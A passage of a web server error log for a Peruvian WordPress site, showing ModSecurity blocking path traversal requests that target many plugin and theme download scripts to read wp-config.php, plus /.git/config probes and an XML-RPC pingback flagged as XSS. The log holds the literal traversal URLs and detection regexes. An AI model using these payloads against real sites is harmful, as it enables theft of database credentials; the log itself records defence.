"OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/recent-backups/download-file.php"] [unique_id "Z3kgvG7tDNGKuRucJQxpfgAAAIQ"] [Sat Jan 04 06:51:25.332879 2025] [:error] [pid 20805:tid 139730066839296] [client 88.99.78.253:41554] [client 88.99.78.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "Z3kgvaZHYAKiNdQSw1MMCwAAAAs"] [Sat Jan 04 06:51:25.901831 2025] [:error] [pid 20805:tid 139729999697664] [client 88.99.78.253:41556] [client 88.99.78.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/sniplets/modules/syntax_highlight.php"] [unique_id "Z3kgvaZHYAKiNdQSw1MMDAAAABM"] [Sat Jan 04 06:51:26.283052 2025] [:error] [pid 21362:tid 139730108802816] [client 88.99.78.253:41558] [client 88.99.78.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/tera-charts/charts/treemap.php"] [unique_id "Z3kgvrx6m_tTeWpdwCn0zQAAAMY"] [Sat Jan 04 06:51:26.748438 2025] [:error] [pid 20806:tid 139730024875776] [client 88.99.78.253:41560] [client 88.99.78.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "Z3kgvrmLfyDr56bh-wtWIAAAAFA"] [Sat Jan 04 06:51:27.216670 2025] [:error] [pid 20806:tid 139730201560832] [client 88.99.78.253:41562] [client 88.99.78.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "Z3kgv7mLfyDr56bh-wtWIQAAAEM"] [Sat Jan 04 06:51:27.771698 2025] [:error] [pid 20807:tid 139730041661184] [client 88.99.78.253:41564] [client 88.99.78.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "Z3kgv27tDNGKuRucJQxpfwAAAI4"] [Sat Jan 04 06:51:28.233918 2025] [:error] [pid 21362:tid 139730201560832] [client 88.99.78.253:41566] [client 88.99.78.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php"] [unique_id "Z3kgwLx6m_tTeWpdwCn0zgAAAMM"] [Sat Jan 04 06:51:28.623722 2025] [:error] [pid 20806:tid 139729991304960] [client 88.99.78.253:41568] [client 88.99.78.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ungallery/source_vuln.php"] [unique_id "Z3kgwLmLfyDr56bh-wtWIgAAAFQ"] [Sat Jan 04 06:51:28.997976 2025] [:error] [pid 21362:tid 139730226738944] [client 88.99.78.253:41570] [client 88.99.78.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php"] [unique_id "Z3kgwLx6m_tTeWpdwCn0zwAAAMA"] [Sat Jan 04 06:51:29.372095 2025] [:error] [pid 20805:tid 139730075232000] [client 88.99.78.253:41572] [client 88.99.78.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/db-backup/download.php?file=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "Z3kgwaZHYAKiNdQSw1MMDQAAAAo"] [Sat Jan 04 06:51:29.837535 2025] [:error] [pid 20807:tid 139730226738944] [client 88.99.78.253:41574] [client 88.99.78.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/mac-dock-gallery/macdownload.php?albid=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mac-dock-gallery/macdownload.php"] [unique_id "Z3kgwW7tDNGKuRucJQxpgAAAAIA"] [Sat Jan 04 08:19:04.296936 2025] [authz_core:error] [pid 21362:tid 139730226738944] [client 206.189.19.19:42546] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/01/04 08:19:08 [error] 20688#20688: *244190 access forbidden by rule, client: 206.189.19.19, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/01/05 02:28:57 [error] 20689#20689: *253201 access forbidden by rule, client: 195.178.110.57, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Jan 05 03:50:44.750758 2025] [ssl:warn] [pid 30033:tid 139895065962368] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 05 03:50:45.042606 2025] [ssl:warn] [pid 30034:tid 139895065962368] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 05 03:50:45.682616 2025] [ssl:warn] [pid 30034:tid 139895065962368] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 05 03:50:47.950310 2025] [ssl:warn] [pid 30034:tid 139895065962368] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 05 03:50:50.397281 2025] [ssl:warn] [pid 30482:tid 139978215200640] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 05 03:50:50.601807 2025] [ssl:warn] [pid 30483:tid 139978215200640] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2025/01/05 05:55:55 [error] 30340#30340: *254843 access forbidden by rule, client: 43.201.65.78, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/01/05 06:16:50 [error] 30339#30339: *254997 access forbidden by rule, client: 13.203.154.127, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/01/05 07:43:43 [error] 30339#30339: *256001 access forbidden by rule, client: 13.203.154.127, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/01/05 09:27:30 [error] 30340#30340: *256810 access forbidden by rule, client: 13.203.154.127, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Mon Jan 06 03:30:42.694648 2025] [ssl:warn] [pid 2447:tid 140370757883776] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 06 03:30:42.988930 2025] [ssl:warn] [pid 2448:tid 140370757883776] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 06 03:30:43.463248 2025] [ssl:warn] [pid 2448:tid 140370757883776] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 06 03:30:45.600533 2025] [ssl:warn] [pid 2448:tid 140370757883776] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 06 03:30:47.877873 2025] [ssl:warn] [pid 2863:tid 139727379388288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 06 03:30:48.087821 2025] [ssl:warn] [pid 2864:tid 139727379388288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 06 05:21:51.056381 2025] [authz_core:error] [pid 3993:tid 139726946227968] [client 167.99.181.249:48426] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/01/06 05:21:54 [error] 2844#2844: *264327 access forbidden by rule, client: 167.99.181.249, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Jan 06 06:42:33.537770 2025] [authz_core:error] [pid 2883:tid 139727004976896] [client 209.38.208.202:48738] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/01/06 06:42:38 [error] 2845#2845: *264467 access forbidden by rule, client: 209.38.208.202, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Mon Jan 06 08:08:28.615048 2025] [ssl:warn] [pid 8134:tid 140011495331712] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 06 08:08:28.845836 2025] [ssl:warn] [pid 8135:tid 140011495331712] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2025/01/06 09:10:11 [error] 2845#2845: *265261 access forbidden by rule, client: 34.235.149.156, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Jan 06 11:44:22.381245 2025] [autoindex:error] [pid 8138:tid 140011185870592] [client 20.192.23.207:53904] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Jan 07 03:16:51.020641 2025] [ssl:warn] [pid 29848:tid 139749512550272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 07 03:16:51.246611 2025] [ssl:warn] [pid 29849:tid 139749512550272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 07 03:16:51.846285 2025] [ssl:warn] [pid 29849:tid 139749512550272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 07 03:16:54.268680 2025] [ssl:warn] [pid 29849:tid 139749512550272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 07 03:16:56.625431 2025] [ssl:warn] [pid 30265:tid 139871795595136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 07 03:16:56.827731 2025] [ssl:warn] [pid 30266:tid 139871795595136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 07 12:21:37.157214 2025] [:error] [pid 30999:tid 139871431644928] [client 37.139.53.179:48768] [client 37.139.53.179] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).*?(((l|(\\\\\\\\u006C))(o|(\\\\\\\\u006F))(c|(\\\\\\\\u0063))(a|(\\\\\\\\u0061))(t|(\\\\\\\\u0074))(i|(\\\\\\\\u0069))(o|(\\\\\\\\u006F))(n|(\\\\\\\\u006E)))|((n|(\\\\\\\\u006E))(a|(\\\\\\\\u0061))(m|(\\\\\\\\u006D))(e|(\\\\\\\\u0065)))|((o|(\\\\\\\\u006F))(n|(\\\\ ..." at ARGS:<?xml version. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "514"] [id "973332"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22?> <methodCall> <methodName>pingback.ping</methodName> <params> <param> <value><string>https://500px.com/p/arrameru/?view= found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22utf-8\\x22 standalone=\\x22yes\\x22?> <methodCall> <methodName>pingback.ping</methodName> <params> <param> <value><string>https://500px.com/p/arrameru/?view=groups</string></value> </param> <param> <value><string>http://investigacionperu.com</string></value> </param> </params> </methodCall>"] [ver "OWASP_CRS/ [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z31iocFjaDGnGTwiMkmNtQAAAM0"], referer: https://investigacionperu.com/ [Wed Jan 08 01:02:17.906075 2025] [:error] [pid 30999:tid 139871398074112] [client 139.59.233.183:36416] [client 139.59.233.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=../../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Z34U6cFjaDGnGTwiMkmTcQAAANE"] [Wed Jan 08 01:02:22.126313 2025] [:error] [pid 30999:tid 139871473608448] [client 139.59.233.183:36426] [client 139.59.233.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin.php?page=multi_metabox_listing&action=edit&id=../../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin.php"] [unique_id "Z34U7sFjaDGnGTwiMkmTcgAAAMg"] [Wed Jan 08 01:02:27.020664 2025] [:error] [pid 30283:tid 139871473608448] [client 139.59.233.183:36432] [client 139.59.233.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "Z34U8zYH-YfZp_zI188hqQAAAAg"] [Wed Jan 08 01:02:27.988818 2025] [:error] [pid 30999:tid 139871356110592] [client 139.59.233.183:36436] [client 139.59.233.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/google-document-embedder/libs/pdf.php"] [unique_id "Z34U88FjaDGnGTwiMkmTdAAAANY"] [Wed Jan 08 01:02:28.940687 2025] [:error] [pid 30999:tid 139871507179264] [client 139.59.233.183:36438] [client 139.59.233.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/google-mp3-audio-player/direct_download.php"] [unique_id "Z34U9MFjaDGnGTwiMkmTdQAAAMQ"] [Wed Jan 08 01:02:29.916873 2025] [:error] [pid 30284:tid 139871507179264] [client 139.59.233.183:36442] [client 139.59.233.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=../../wp-config.php"] [severity 